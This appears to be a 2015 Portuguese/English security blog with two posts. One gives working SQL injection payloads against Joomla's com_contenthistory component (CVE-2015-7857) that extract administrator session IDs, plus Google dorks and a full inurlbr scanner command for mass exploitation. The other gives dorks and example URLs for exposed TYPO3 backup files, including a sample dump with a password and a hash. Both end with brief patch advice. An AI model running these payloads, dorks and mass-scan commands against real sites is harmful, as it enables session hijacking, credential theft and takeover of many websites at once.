terça-feira, 27 de outubro de 2015

Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation.

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.  Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.  CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.  CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.  The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.


Joomla CMS that affects more than 2.8 million sites.
Joomla is probably one of web content management (or CMS) more used to creating websites at the enterprise level but also widely used for developing personal websites.
It is an Open source software under the GNU / GPL license, being updated by a community of programmers organized a non-profit structure (Joomla.org).
According to Trustwave joomla CMS (3.2 to 3.4.4) have serious security flaws enabling SQL Injection-type attacks which allow attackers to "win" platform Administrator privileges

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.
Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html
Source INFO-> [  More Info ]

It was found that the following code snippet is vulnerable SQLI:
PWD: /administrator/components/com_contenthistory/models/history.php
The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info  It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php
FUNCTION FULL:
 /**
  * Build an SQL query to load the list data.
  *
  * @return  JDatabaseQuery
  *
  * @since   3.2
  */
 protected function getListQuery()
 {
  // Create a new query object.
  $db = $this->getDbo();
  $query = $db->getQuery(true);

  // Select the required fields from the table.
  $query->select(
   $this->getState(
    'list.select',
    'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
    'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
   )
  )
  ->from($db->quoteName('#__ucm_history') . ' AS h')
  ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
  ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

  // Join over the users for the editor
  ->select('uc.name AS editor')
  ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');

  // Add the list ordering clause.
  $orderCol = $this->state->get('list.ordering');
  $orderDirn = $this->state->get('list.direction');
  $query->order($db->quoteName($orderCol) . $orderDirn);

  return $query;
 }
CODE FULL:
http://pastebin.com/9FnPuns5

PoC:
REQUEST GET
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

It is possible to extract session ID (cookies) of users logged into the system and set in your browser.
REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)  It is possible to extract session ID (cookies) of users logged into the system and set in your browser.
Video demonstration:


In this article we will work SQLI exploitation.

RETURN REQUEST - Exemple Explotation:
URL:
http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)
PRINT REQUEST:
PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)   RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)  PRINT REQUEST:

Base validation:
ENCODER HEX =  :INURLBR: 
RESULT =                0x203a494e55524c42523a20

INJECT: 0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20....
DORK:
  1. components/com_contenthistory/
  2. inurl:com_contenthistory
  3. index.php?option=com_contenthistory
  4. "index of" components/com_contenthistory/
  5. inurl:"components/com_contenthistory/"
  6. inurl:"index.php?option=com_contenthistory"
Search demonstration:
DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
 --dork 'YOU_DORK'
 OR
 --dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-q all
  we will use all the search engines available in the script

SET OUTPUT FILE:
 -s com_contenthistory.txt

SET TIPE VALIDATION:
 -t 2
    2 The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
              It also establishes connection with the exploit through the get method.

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.localhost.br/user?id=313032303330

--exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))'

hex(INURLBR) = 494e55524c4252

Example injection:
http://www.target.localhost.br/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example:  -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'INURLBR'

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL: 
php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique


Execution return:
 SET STRING VALIDATION: Specify the string that will be used on the search script:      Example:  -a {string}      Usage:    -a '<title>hello world</title>'      If specific value is found in the target he is considered vulnerable.      Setting:   -a 'INURLBR'  SET FILTER RESULTS:  --unique    Filter results in unique domains.    removes all gets the URL  Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.  COMMAND FULL:  php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique   Execution return:


SOLUTION:Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5.
UPDATE:
https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html

Source INFO-1-> https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0

Source INFO-2-> https://cxsecurity.com/issue/WLB-2015100146

quarta-feira, 14 de outubro de 2015

( 0day ) CMS Typo3 / Falha Full Info Disclosure

Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor. No procedimento de criar dork, refazer, criar um novo padrão acabei descobrindo uma falha no CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma.

Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor.
No procedimento de criar dork, refazer e criar um novo padrão. acabei descobrindo uma falha no
CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma.


"Não é um CMS muito usado, o artigo é somente para estudos mesmo, um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."
"Não é um CMS muito usado, o artigo é somente para estudos mesmo. Um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."

Observando bem os arquivos eles seguem um padrão de backup do próprio sistema, em pastas desprotegidas. O Google indexa seu conteúdo que é totalmente possível acessá-los com operadores avançados de pesquisa - (DORKS / STRINGS).
Os arquivos de senha são guardados na pasta "/fileadmin/"  alguns com uma string fixa nome "utopia"  e sua extensão é ".t3d.xml" ou .t3d


INFORMAÇÕES:

#  ----------------------------------------------------------
#[+]  Type:         Full Info Disclosure  
#[+]  Vendor:       https://typo3.org/typo3-cms/
#[+]  VULNERABLE VERSIONS:  4.2, 4.5
#  ----------------------------------------------------------

#[+]  AUTOR:        googleINURL
#[+]  EMAIL:        inurlbr@gmail.com
#[+]  Blog:         http://blog.inurl.com.br
#[+]  Twitter:      https://twitter.com/googleinurl
#[+]  Fanpage:      https://fb.com/InurlBrasil
#[+]  Pastebin      http://pastebin.com/u/Googleinurl
#[+]  GIT:          https://github.com/googleinurl
#[+]  PSS:          http://packetstormsecurity.com/user/googleinurl
#[+]  YOUTUBE:      http://youtube.com/c/INURLBrasil
#[+]  PLUS:         http://google.com/+INURLBrasil
#[+]  IRC:          irc.pŕiv8.jp / #inurlbrasil

 DORKS DE PESQUISA:
  1. /fileadmin/utopia ext:xml
  2. /fileadmin/utopia*.t3d.xml
  3. site:fr /fileadmin/utopia ext:xml
  4. "utopia" inurl:t3d ext:xml
  5. /fileadmin/  typo3 ext:t3d
POC ARQUIVO .XML:

http://{server}/fileadmin/utopia{random}.t3d.xml
http://{server}/subdir/fileadmin/utopia{random}.t3d.xml
Ex:
http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml
http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml

Exemplo Conteúdo arquivo:

POC ARQUIVO .T3D:

http://{server}/fileadmin/*.t3d
http://{server}/fileadmin/archives_site/*.t3d
http://{server}/subdir/fileadmin/*.t3d
Ex:
http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d
http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d

Exemplo Conteúdo arquivo:
s:11:"admin_xxxx";s:5:"email";s:26:"admin@xxxx-autoxxxx.fr";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"admin@xxx-autopartage.fr";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1

Pesquisa em massa usando SCANNER INURLBR.
Download: https://github.com/googleinurl/SCANNER-INURLBR
Comando:
php inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t  2 -a '<username>'
Resultado:
Solução ? Faça upgrade do CMS e Configure adequadamente as permissões de arquivos e pastas do se servidor.